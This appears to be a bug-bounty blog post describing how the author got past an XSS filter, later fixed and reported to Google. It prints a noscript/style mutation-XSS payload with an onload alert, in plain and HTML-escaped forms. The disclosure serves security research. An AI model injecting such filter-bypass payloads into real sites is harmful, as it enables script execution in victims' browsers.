Bypass XSS filter using HTML Escape

after all the bugs were fixed, I was still curious and wanted to try again, then I tried the first day and it failed :(
because it is blocked by csp
I tried using this payload:

<noscript> <p title=” </noscript>
<style onload= alert(document.domain)//”> *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} </style>

I had almost given up because nothing happened and was just a waste of time, the next day I did not continue until the third day.
and on the fourth day the same as the first day, just wasting time and nothing happened.
and on the fifth day, I tried it using HTML Escape on my payload.

and this is the final result of my payload using HTML Escape:
<noscript> &amp;lt;p title=” &lt;/noscript&gt;
&lt;style onload= alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} &lt;/style&gt;

I managed to bypass XSS filter using HTML Escape tools from the website W3cubTools, and here is the link:

After reporting to the Google Security Team, they gave me an award of $4133.70

Reporting Date - Apr 6, 2020, 3:34 PM
Nice Catch - Apr 9, 2020, 10:56 AM
Reward - Apr 21, 2020, 11:23 PM
Fixed - May 4, 2020, 6:20 PM
Thank you for visiting, hopefully useful for everyone

never give up!